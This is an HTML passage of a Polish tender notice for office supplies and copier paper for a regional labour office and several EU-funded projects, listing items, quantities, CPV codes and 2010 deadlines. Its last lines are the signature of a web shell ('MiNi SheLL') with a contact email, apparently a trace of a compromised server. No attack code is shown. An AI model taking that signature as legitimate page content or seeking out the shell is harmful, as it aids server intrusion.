34.Kostka biurowa kolor 8,5x8,5 mm- 	50 szt.	
35.Koszulki A4 groszek wykonane z folii PP - 700 opak. 
36.Linijka plastikowa 20 cm	- 20 szt.	
37.Linijka plastikowa  30 cm	- 20 szt.	
38.Marker do tablic suchościeralnych z okrągłą końcówką -  80 szt.	
39.Marker zwykły, wszystkie kolory z okrągłą końcówką	- 60 szt.	
40.Masa mocująca w opakowaniu po 35g	- 2 opak.
41.Naboje atramentowe typu Watterman ( długie )  - 20 opak.
42.Naboje atramentowe typu Parker - 	20 opak. 
43.Mechanizm skoroszytowy  -	2 opak.
44.Nożyczki wykonane z nierdzewnej stali, gumowy uchwyt 20 cm-	50szt.
45.Ofertówka   -	1250 szt.	
46.Okładki do bindowania przeźroczyste przód - 	5opak.
47.Okładki do bindowania tył karton twardy jednostronnie kolorowy  -	5opak.
48.Ołówek z gumką HB -	360szt.	
49.Papier do faksu 210x30 mm  	- 3opak.
50.Pióro kulkowe czarne o grubości linii 0,2 mm	- 50szt.
51.Przekładki do segregatorów z kolorowego polipropylenu formatu A4, -  50opak.
52.Przybornik na biurko - walec dymny z przegródkami	 - 50szt.	
53.Pudełko archiwizacyjne o szerokości grzbietu 100 mm,-  	300szt.	
54.Pudło archiwizacyjne z tektury bezkwasowej  	- 150szt.	
55.Pinezki kolorowe  - 10opak.
56.Segregator A4/70-75 kolor z mechanizmem dźwigniowym  - 100szt.	
57.Segregator A4/50 kolor z mechanizmem dźwigniowym -	50szt.	
58.Spinacze okrągłe 28 mm  - 100opak. 
59.Spinacze plikowe   -	20opak.
60.Spinacze krzyżowe   -	10opak. 
61.Szuflada na dokumenty na biurko - dymna - pozioma -	48szt.	
62.Szuflada na dokumenty na biurko - pionowa PCV -	10szt.	
63.Taśma klejąca  18mm x 10mm   -	10opak.
64.Taśma klejąca  24mm x 20mm -  	10opak.
65.Teczka do podpisu zawierająca co najmniej 15 kartek -	50szt.	
66.Teczka wiązana kartonowa A4 biała	1000szt.	
67.Teczka z gumką kolorowa A4 -	500szt.	
68.Teczka skrzydłowa na rzep -	48szt.	
69.Teczka zawieszkowa biała kartonowa -	500szt.	
70.Teczka zawieszana kolorowa-niebieska z etykietą -	100szt.	
71.Temperówka pojedyncza metalowa	- 50szt.	
72.Zakreślacz  ze ściętą końcówką 	- 120szt.	
73.Zszywacz o metalowej konstrukcji  -	25szt.	
74.Zszywki do zszywaczy 24/6    - 400opak.
75.Kalendarz biurkowy-terminarz leżący na rok 2011 - 10szt.	
76.Kalendarz biurkowy-terminarz stojący na rok 2011   230szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - dostawa papieru dla potrzeb WUP:

1.Papier kserograficzny A4 80g -  2000 ryz
2.Papier Laser Photo błyszczący, dwustronny A4  - 2 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - dostawa materiałów biurowych dla potrzeb projektu systemowego  PO KL pt. Program monitorowania regionalnego rynku pracy:
 
1.Długopis z systemem przyciskowym  - 5szt.	
2.Klip do papieru 32 mm  	- 1opak..
3.Koszulki A4 przezroczyste  	- 4 opak.
4.Marker do płyt CD wodoodporny  - 2szt.		
5.Papier kserograficzny A4 80 g  - 10 ryz
6.Pinezki do tablicy korkowej   - 1opak.
7.Pióro kulkowe czarne i niebieskie o grub. linii 0,5 mm -	8szt.		
8.Segregator A4/50 kolor z mechanizmem dźwigniowym -	5szt.		
9.Segregator A4/75 kolor z mechanizmem dźwigniowym -	5szt.		
10.Zakładki indeksujące, do zaznaczania stron w dokumentach  - 1opak.
11.Zakreślacze kolorowe ze ściętą końcówką  -	8szt.		
12.Zszywki do zszywaczy 24/6 min 40 kartek  -	5opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV - dostawa materiałów biurowych dla potrzeb projektu systemowego
                   PO KL pt. Promocja przedsiębiorczości w województwie śląskim:

1.Długopis żelowy z wymiennym wkładem  - 3szt.	
2.Długopis - 5szt.	
3.Dziurkacz z ogranicznikiem formatu 	- 1szt.	
4.Etykiety samoprzylepne o wym. 70x30  -	1opak. 
5.Folia do bindowania 0,2 mm bezbarwna  - 1opak.
6.Grzbiety do bindowania A4, rozmiar 10 mm 	-1opak. 
7.Grzbiety do bindowania A4, rozmiar 12 mm 	-1opak. 
8.Grzbiety do bindowania A4, rozmiar 25 mm  	-1opak. 
9.Kalkulator  -	2szt.	
10.Karton do bindowania  	- 1opak. 
11.Koperty C5, białe, samoprzylepne (bez paska), 80g/m2    - 1opak. 
12.Koszulki A4 przezroczyste wykonane z folii PP  	- 3opak. 
13.Marker do płyt CD/DVD czarny	- 1szt.
14.Marker do tablic suchościeralnych, wymienny wkład 	- 1opak.
15.Nożyczki biurowe proste stal nierdzewna 21 cm - 1szt.	
16.Ołówek zwykły z gumką HB 2 - 5szt.	
17.Pinezki kołeczki kolorowe do tablic korkowych  - 1opak.
18.Rozszywacz -	3szt.	
19.Segregator A4/75 mm kolor z mechanizmem dźwigniowym  - 5szt.	
20.Spinacze okrągłe 28 mm  	- 1opak. 
21.Spinacze plikowe 50 mm  	- 1opak.
22.Taśma klejąca 18mm*30m	  - 2szt. 
23.Teczka do podpisu  	- 2szt.	
24.Temperówka metalowa- 	2szt.	
25.Tusz do stempli gumowych - czerwony - 1szt.	
26.Zakreślacze ze ściętą końcówką  	 - 1opak. 
27.Zszywacz nożycowy min. 40 kartek na zszywki 24/ 6, 24/ 8 - 1szt.	
28.Zszywki o wymiarach 23/6  - 5opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część V - dostawa papieru dla potrzeb projektu systemowego PO KL pt. Promocja przedsiębiorczości w województwie śląskim:
Papier kserograficzny dostarczony przez Wykonawcę:
1)	kolor biały,
2)	pozwalający na wydruki z urządzeń typu:  
  - drukarki atramentowe,
  - drukarki laserowe,
  - faksy,
  - kserokopiarki.

1.Papier kserograficzny A4 (gramatura 80 g/m2) o białości nie mniejszej niż CIE 146 pakowany w ryzach po 500 arkuszy		20 ryz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VI - dostawa materiałów biurowych dla potrzeb projektu konkursowego PO KL pt. Kompetencje na miarę potrzeb:

1.Atrament do piór wiecznych, niebieski min. 57 ml		5szt.	
2.Automatyczny numerator 	- 1szt.	
3.Bloczek samoprzylepny 38mmx51mm  - 10opak.
4.Bloczek samoprzylepny 76mmx76mm   - 20opak.
5.Bloczek samoprzylepny 76mmx76mm   - 2opak.
6.Bloczek samoprzylepny 76mmx76mm  - 1opak.
7.Kostka biurowa biała, wymiary 75mm x 75 mm	- 20szt.	
8.Blok papierowy do flipchartów gładki 40 kartek - 	5szt.	
9.Bloki biurowe w kratkę, 100 kartek, Format A4	- 10szt.	
10.Cienkopis automatyczny z wymiennym wkładem czarnym;  - 5szt.	
11.Cienkopis automatyczny z wymiennym wkładem czerwony;  - 5szt.	
12.Cienkopis automatyczny z wymiennym wkładem niebieskim;  - 20szt.	
13.Datownik automatyczny wysokość cyfr/liter 4 mm - 1szt.	
14.Długopis żelowy z wymiennym wkładem czarnym;    - 5szt.	
15.Długopis żelowy z wymiennym wkładem czerwonym;  -  	5szt.	
16.Długopis żelowy z wymiennym wkładem niebieskim; gumowy uchwyt;  -	20szt.	
17.Długopis, czarny, obrotowy mechanizm wysuwania wkładu   -	5szt.	
18.Dziurkacz z ogranicznikiem formatu - 	5szt.	
19.Etykiety samoprzylepne o wym. 70x30  -	2opak.
20.FlipChart, pozwalający na pisanie pisakami, tablica łatwościeralna  - 1szt.	
21.Okładka do bindowania przeźroczysta przód  	- 4opak.
22.Grafity do ołówków automatycznych, grubość wkładu 0,5 mm, HB	- 20opak.
23.Grzbiety do bindowania A4, rozmiar 10 mm 	- 2opak.
24.Grzbiety do bindowania A4, rozmiar 12 mm 	- 2opak.
25.Grzbiety do bindowania A4, rozmiar 25 mm 	- 2opak.
26.Grzbiety do bindowania A4, rozmiar 8 mm 	- 2opak.
27.Gumka mała (miękka) do stosowania na papierze- 10szt.	
28.Kalendarz książkowy na rok 2011 A4 tygodniowy  - 5szt.	
29.Kalkulator  	- 5szt.	
30.Kartki - wkład 5 kolorowy, wymiary 85 mm x 85 mm -	20opak. 
31.Karton do bindowania Chromolux 250g A4 - czarny  -	2opak.
32.Karton do bindowania Chromolux 250g A4 - niebieski   	- 2opak. 
33.Karty wizytowe do wizytownika, dwustronne]	- 10opak.
34.Kieszeń samoprzylepna na płyty CD - 5opak. 
35.Klej w sztyfcie pojemność 8g  - 2szt.
36.Klipy biurowe, 25 mm 	- 5 opak. 
37.Klipy biurowe, 32 mm 	- 5 opak. 
38.Klipy biurowe, 41 mm 	- 5 opak. 
39.Kolorowe magnesy do tablic magnetycznych, średnica 28 mm -	2opak. 
40.Kołonotatnik, A4, 90 kartek, 80g/m2, kratka- 	20szt.	
41.Kołonotatnik, A5 80 kartek, 80g/m2, kratka- 20szt.	
42.Koperty C5, białe, samoprzylepne (bez paska), 80g/m2 -  10opak. 
43.Korektor w długopisie; szybkoschnący   - 2szt.	
44.Kostka biurowa kolor 8,5x8,5 mm	- 20szt.	
45.Kosz na papier 12 l  - 	5szt.	 
46.Koszulki A4 na wizytówki; przezroczyste, 20 wizytówek 	- 10szt.	
47.Koszulki A4 przezroczyste wykonane z folii PP -  70opak. 
48.Linijka 30 cm, polistyren	 - 10szt.	
49.Marker do płyt CD/DVD czarny	-  5szt.	
50.Marker do tablic sucho ścieralnych, wymienny wkład	- 4opak. 
51.Notes (kartki) w pojemniku plastikowym 	- 5szt.	
52.Nożyczki biurowe proste stal nierdzewna 21 cm  -  5szt.	
53.Ofertówka A4  -	100szt.	
54.Ołówek automatyczny z wkładem 0.5 mm  -	10szt.	
55.Ołówek zwykły z gumką HB 2 -	20szt.	
56.Pinezki kołeczki kolorowe do tablic korkowych  - 1opak. 
57.Pióro wieczne, czarne  -	5szt.
58.Planer tygodniowy   -	1szt.	
59.Poduszka do stempli czarny (160X90mm) -	4szt.	
60.Przekładka kartonowa 1/3 A4 	- 5opak.
61.Przybornik na karteczki  -	5szt.	
62.Przybornik na wizytówki  	- 5szt.	
63.Przybornik stojący duży -  	5szt.	
64.Przybornik stojący mały  -	5szt.	
65.Przybornik stojący na dokumenty  -	5szt.	
66.Przybornik z przegr., kart. i miejscem na taśmę  -5szt.	
67.Przybornik z przegrodami na biurko - 	5szt.	
68.Pudło archiwizacyjne zbiorcze kartonowe A4;  -	40szt.	
69.Pudło do archiwizacji dokumentów kartonowe A4 - 200szt.	
70.Rozszywacz	- 6szt.	
71.Różnokolorowe breloczki do kluczy, z wymienną etykietą	 -  20szt.	 
72.Segregator A4/75 mm kolor z mechanizmem dźwigniowym - 200szt.	
73.Spinacze krzyżowe  - 5opak. 
74.Spinacze okrągłe 28 mm  	-  5opak. 
75.Spinacze plikowe 50 mm  	- 5 opak. 
76.Stojak do kopert - metalowy - 5szt.	
77.Stojak na 16 płyt CD/DVD  -  5szt.	
78.Stojak na książki  -  5szt.	
79.Sznurek do archiwizacji - dratwa - waga 10 dag  -  5szt.	
80.Tablica suchościerna, wym. 1200 mm x 900 mm - 1szt.	
81.Taśma klejąca 18mm*30m - 3szt.
82.Teczka do podpisu  - 4szt.	
83.Teczka harmonijkowa -	20szt.	
84.Teczka na rzep A4 -10szt.
85.Teczka z gumką A4  - 30szt.
86.Temperówka metalowa -5szt.	
87.Tusz do stempli gumowych - czarny -2szt.	
88.Tusz do stempli gumowych - czerwony -3szt.	
89.Wizytownik obrotowy, pojemność 400 sztuk -	5szt.	
90.Wkłady do długopisów  -	10szt.	
91.Wkłady do długopisów  -	10szt.	
92.Zakładki indeksujące w bloczkach pakowane po 4 kolory x 50 kartek -10opak. 
93.Zakreślacz  	-  5opak. 
94.Zakreślacz z 50 zakładkami - 30szt.	
95.Zakreślacze ze ściętą końcówką  -	10opak. 
96.Zestaw 3 szuflad   - 5szt.	
97.Zestaw 3 szuflad na ścianę  - 5szt.	
98.Zszywacz nożycowy  -	10szt.	
99.Zszywacz zszywający min 100 kartek  - 1szt.	
100.Zszywki o wymiarach 23/10  - 5 opak. 
101.Zszywki o wymiarach 23/13  - 5opak. 
102.Zszywki o wymiarach 23/6  - 5opak..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa materiałów biurowych oraz papieru..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część VII - dostawa papieru dla potrzeb projektu konkursowego PO KL 
 pt. Kompetencje na miarę potrzeb:
Papier kserograficzny dostarczany przez Wykonawcę:
1) kolor biały, kolor morski, kolor     zielony, kolor żółty
2) pozwalający na wydruk z urządzeń typu:
- drukarki atramentowej
- drukarki laserowej
- faksy
- kserokopiarki

1.Papier kolorowy, morski, ryza po 500 szt. Format A4, 80 g/m4	- 2 ryzy 
2.Papier kolorowy, zielony, ryza po 500 szt. 80 g/m3	- 2 ryzy
3.Papier kolorowy, zółty, ryza po 500 szt. - 2 ryzy
4.Papier kserograficzny Format A4 (gramatura 80 g/m2)	- 100 ryz
5.Papier kserograficzny, profesjonalny kolorowy wydruk o fotograficznej jakości  - 10 ryz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com